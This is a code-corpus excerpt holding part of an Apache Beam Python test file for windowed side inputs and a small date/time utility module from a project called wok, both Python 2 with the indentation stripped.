_multiprocess_can_split_ = True
def create_pipeline(self):
return TestPipeline()
def run_windowed_side_inputs(self, elements, main_window_fn,
side_window_fn=None,
side_input_type=beam.pvalue.AsList,
combine_fn=None,
expected=None):
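    # Helper: timestamp the elements, window the main and side PCollections as
    # requested, attach the chosen side-input view (optionally pre-combined),
    # and assert the resulting (element, side value) pairs.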
with self.create_pipeline() as p:
pcoll = p | beam.Create(elements) | beam.Map(
lambda t: window.TimestampedValue(t, t))
main = pcoll | 'WindowMain' >> beam.WindowInto(main_window_fn)
side = pcoll | 'WindowSide' >> beam.WindowInto(
side_window_fn or main_window_fn)
kw = {}
if combine_fn is not None:
side |= beam.CombineGlobally(combine_fn).without_defaults()
kw['default_value'] = 0
elif side_input_type == beam.pvalue.AsDict:
side |= beam.Map(lambda x: ('k%s' % x, 'v%s' % x))
res = main | beam.Map(lambda x, s: (x, s), side_input_type(side, **kw))
if side_input_type in (beam.pvalue.AsIter, beam.pvalue.AsList):
res |= beam.Map(lambda (x, s): (x, sorted(s)))
assert_that(res, equal_to(expected))
def test_global_global_windows(self):
self.run_windowed_side_inputs(
[1, 2, 3],
window.GlobalWindows(),
expected=[(1, [1, 2, 3]), (2, [1, 2, 3]), (3, [1, 2, 3])])
def test_same_fixed_windows(self):
self.run_windowed_side_inputs(
[1, 2, 11],
window.FixedWindows(10),
expected=[(1, [1, 2]), (2, [1, 2]), (11, [11])])
def test_different_fixed_windows(self):
self.run_windowed_side_inputs(
[1, 2, 11, 21, 31],
window.FixedWindows(10),
window.FixedWindows(20),
expected=[(1, [1, 2, 11]), (2, [1, 2, 11]), (11, [1, 2, 11]),
(21, [21, 31]), (31, [21, 31])])
def test_fixed_global_window(self):
self.run_windowed_side_inputs(
[1, 2, 11],
window.FixedWindows(10),
window.GlobalWindows(),
expected=[(1, [1, 2, 11]), (2, [1, 2, 11]), (11, [1, 2, 11])])
def test_sliding_windows(self):
self.run_windowed_side_inputs(
[1, 2, 4],
window.SlidingWindows(size=6, period=2),
window.SlidingWindows(size=6, period=2),
expected=[
# Element 1 falls in three windows
(1, [1]), # [-4, 2)
(1, [1, 2]), # [-2, 4)
(1, [1, 2, 4]), # [0, 6)
# as does 2,
(2, [1, 2]), # [-2, 4)
(2, [1, 2, 4]), # [0, 6)
(2, [2, 4]), # [2, 8)
# and 4.
(4, [1, 2, 4]), # [0, 6)
(4, [2, 4]), # [2, 8)
(4, [4]), # [4, 10)
])
def test_windowed_iter(self):
self.run_windowed_side_inputs(
[1, 2, 11],
window.FixedWindows(10),
side_input_type=beam.pvalue.AsIter,
expected=[(1, [1, 2]), (2, [1, 2]), (11, [11])])
def test_windowed_singleton(self):
self.run_windowed_side_inputs(
[1, 2, 11],
window.FixedWindows(10),
side_input_type=beam.pvalue.AsSingleton,
combine_fn=sum,
expected=[(1, 3), (2, 3), (11, 11)])
def test_windowed_dict(self):
self.run_windowed_side_inputs(
[1, 2, 11],
window.FixedWindows(10),
side_input_type=beam.pvalue.AsDict,
expected=[
(1, {'k1': 'v1', 'k2': 'v2'}),
(2, {'k1': 'v1', 'k2': 'v2'}),
(11, {'k11': 'v11'}),
])
@attr('ValidatesRunner')
def test_empty_singleton_side_input(self):
pipeline = self.create_pipeline()
pcol = pipeline | 'start' >> beam.Create([1, 2])
side = pipeline | 'side' >> beam.Create([]) # Empty side input.
def my_fn(k, s):
# TODO(robertwb): Should this be an error as in Java?
v = ('empty' if isinstance(s, beam.pvalue.EmptySideInput) else 'full')
return [(k, v)]
result = pcol | 'compute' >> beam.FlatMap(
my_fn, beam.pvalue.AsSingleton(side))
assert_that(result, equal_to([(1, 'empty'), (2, 'empty')]))
pipeline.run()
@attr('ValidatesRunner')
def test_multi_valued_singleton_side_input(self):
pipeline = self.create_pipeline()
pcol = pipeline | 'start' >> beam.Create([1, 2])
side = pipeline | 'side' >> beam.Create([3, 4]) # 2 values in side input.
pcol | 'compute' >> beam.FlatMap( # pylint: disable=expression-not-assigned
lambda x, s: [x * s], beam.pvalue.AsSingleton(side))
with self.assertRaises(Exception):
pipeline.run()
@attr('ValidatesRunner')
def test_default_value_singleton_side_input(self):
pipeline = self.create_pipeline()
pcol = pipeline | 'start' >> beam.Create([1, 2])
side = pipeline | 'side' >> beam.Create([]) # 0 values in side input.
result = pcol | beam.FlatMap(
lambda x, s: [x * s], beam.pvalue.AsSingleton(side, 10))
assert_that(result, equal_to([10, 20]))
pipeline.run()
@attr('ValidatesRunner')
def test_iterable_side_input(self):
pipeline = self.create_pipeline()
pcol = pipeline | 'start' >> beam.Create([1, 2])
side = pipeline | 'side' >> beam.Create([3, 4]) # 2 values in side input.
result = pcol | 'compute' >> beam.FlatMap(
lambda x, s: [x * y for y in s],
beam.pvalue.AsIter(side))
assert_that(result, equal_to([3, 4, 6, 8]))
pipeline.run()
@attr('ValidatesRunner')
def test_as_list_and_as_dict_side_inputs(self):
a_list = [5, 1, 3, 2, 9]
some_pairs = [('crouton', 17), ('supreme', None)]
pipeline = self.create_pipeline()
main_input = pipeline | 'main input' >> beam.Create([1])
side_list = pipeline | 'side list' >> beam.Create(a_list)
side_pairs = pipeline | 'side pairs' >> beam.Create(some_pairs)
results = main_input | 'concatenate' >> beam.Map(
lambda x, the_list, the_dict: [x, the_list, the_dict],
beam.pvalue.AsList(side_list), beam.pvalue.AsDict(side_pairs))
def matcher(expected_elem, expected_list, expected_pairs):
def match(actual):
[[actual_elem, actual_list, actual_dict]] = actual
equal_to([expected_elem])([actual_elem])
equal_to(expected_list)(actual_list)
equal_to(expected_pairs)(actual_dict.iteritems())
return match
assert_that(results, matcher(1, a_list, some_pairs))
pipeline.run()
@attr('ValidatesRunner')
def test_as_singleton_without_unique_labels(self):
# This should succeed as calling beam.pvalue.AsSingleton on the same
# PCollection twice with the same defaults will return the same
# view.
a_list = [2]
pipeline = self.create_pipeline()
main_input = pipeline | 'main input' >> beam.Create([1])
side_list = pipeline | 'side list' >> beam.Create(a_list)
results = main_input | beam.Map(
lambda x, s1, s2: [x, s1, s2],
beam.pvalue.AsSingleton(side_list), beam.pvalue.AsSingleton(side_list))
def matcher(expected_elem, expected_singleton):
def match(actual):
[[actual_elem, actual_singleton1, actual_singleton2]] = actual
equal_to([expected_elem])([actual_elem])
equal_to([expected_singleton])([actual_singleton1])
equal_to([expected_singleton])([actual_singleton2])
return match
assert_that(results, matcher(1, 2))
pipeline.run()
@attr('ValidatesRunner')
def test_as_singleton_with_different_defaults(self):
a_list = []
pipeline = self.create_pipeline()
main_input = pipeline | 'main input' >> beam.Create([1])
side_list = pipeline | 'side list' >> beam.Create(a_list)
results = main_input | beam.Map(
lambda x, s1, s2: [x, s1, s2],
beam.pvalue.AsSingleton(side_list, default_value=2),
beam.pvalue.AsSingleton(side_list, default_value=3))
def matcher(expected_elem, expected_singleton1, expected_singleton2):
def match(actual):
[[actual_elem, actual_singleton1, actual_singleton2]] = actual
equal_to([expected_elem])([actual_elem])
equal_to([expected_singleton1])([actual_singleton1])
equal_to([expected_singleton2])([actual_singleton2])
return match
assert_that(results, matcher(1, 2, 3))
pipeline.run()
@attr('ValidatesRunner')
def test_as_list_twice(self):
# This should succeed as calling beam.pvalue.AsList on the same
# PCollection twice will return the same view.
a_list = [1, 2, 3]
pipeline = self.create_pipeline()
main_input = pipeline | 'main input' >> beam.Create([1])
side_list = pipeline | 'side list' >> beam.Create(a_list)
results = main_input | beam.Map(
lambda x, ls1, ls2: [x, ls1, ls2],
beam.pvalue.AsList(side_list), beam.pvalue.AsList(side_list))
def matcher(expected_elem, expected_list):
def match(actual):
[[actual_elem, actual_list1, actual_list2]] = actual
equal_to([expected_elem])([actual_elem])
equal_to(expected_list)(actual_list1)
equal_to(expected_list)(actual_list2)
return match
assert_that(results, matcher(1, [1, 2, 3]))
pipeline.run()
@attr('ValidatesRunner')
def test_as_dict_twice(self):
some_kvs = [('a', 1), ('b', 2)]
pipeline = self.create_pipeline()
main_input = pipeline | 'main input' >> beam.Create([1])
side_kvs = pipeline | 'side kvs' >> beam.Create(some_kvs)
results = main_input | beam.Map(
lambda x, dct1, dct2: [x, dct1, dct2],
beam.pvalue.AsDict(side_kvs),
beam.pvalue.AsDict(side_kvs))
def matcher(expected_elem, expected_kvs):
def match(actual):
[[actual_elem, actual_dict1, actual_dict2]] = actual
equal_to([expected_elem])([actual_elem])
equal_to(expected_kvs)(actual_dict1.iteritems())
equal_to(expected_kvs)(actual_dict2.iteritems())
return match
assert_that(results, matcher(1, some_kvs))
pipeline.run()
@attr('ValidatesRunner')
def test_flattened_side_input(self):
pipeline = self.create_pipeline()
main_input = pipeline | 'main input' >> beam.Create([None])
side_input = (
pipeline | 'side1' >> beam.Create(['a']),
pipeline | 'side2' >> beam.Create(['b'])) | beam.Flatten()
results = main_input | beam.FlatMap(
lambda _, ab: ab,
beam.pvalue.AsList(side_input))
assert_that(results, equal_to(['a', 'b']))
pipeline.run()
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main()
| apache-2.0 | -7,915,734,155,681,565,000 | 36.5 | 80 | 0.601032 | false |
edunham/wok | wok/util.py | 11 | 1471 | import re
from unicodedata import normalize
from datetime import date, time, datetime, timedelta
def chunk(li, n):
"""Yield succesive n-size chunks from l."""
for i in xrange(0, len(li), n):
yield li[i:i+n]
def date_and_times(meta):
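    # Reconcile the 'date', 'time' and 'datetime' metadata entries: split a
    # given 'datetime' into its parts, convert an integer number of seconds
    # into a time object, and rebuild 'datetime' from whatever parts are present.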
date_part = None
time_part = None
if 'date' in meta:
date_part = meta['date']
if 'time' in meta:
time_part = meta['time']
if 'datetime' in meta:
if date_part is None:
if isinstance(meta['datetime'], datetime):
date_part = meta['datetime'].date()
elif isinstance(meta['datetime'], date):
date_part = meta['datetime']
if time_part is None and isinstance(meta['datetime'], datetime):
time_part = meta['datetime'].time()
if isinstance(time_part, int):
seconds = time_part % 60
minutes = (time_part / 60) % 60
hours = (time_part / 3600)
time_part = time(hours, minutes, seconds)
meta['date'] = date_part
meta['time'] = time_part
if date_part is not None and time_part is not None:
meta['datetime'] = datetime(date_part.year, date_part.month,
date_part.day, time_part.hour, time_part.minute,
time_part.second, time_part.microsecond, time_part.tzinfo)
elif date_part is not None:
meta['datetime'] = datetime(date_part.year, date_part.month, date_part.day)
else:
meta['datetime'] = None
| mit | -5,873,701,981,500,842,000 | 29.645833 | 83 | 0.588035 | false |